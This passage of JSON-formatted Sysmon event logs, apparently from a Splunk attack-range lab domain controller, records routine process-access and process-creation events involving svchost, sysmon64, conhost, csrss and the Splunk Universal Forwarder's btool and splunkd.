05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00107C2A0500}","TargetProcessId":"4280","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.903\r\nProcessGuid: {A837DB8D-0239-5F25-0000-00103D2B0500}\r\nProcessId: 4188\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nParentProcessId: 4280\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.903","ProcessGuid":"{A837DB8D-0239-5F25-0000-00103D2B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-00107C2A0500}","ParentProcessId":"4280","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nSourceProcessId: 4280\r\nSourceThreadId: 4276\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103D2B0500}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00107C2A0500}","SourceProcessId":"4280","SourceThreadId":"4276","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103D2B0500}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103D2B0500}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103D2B0500}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 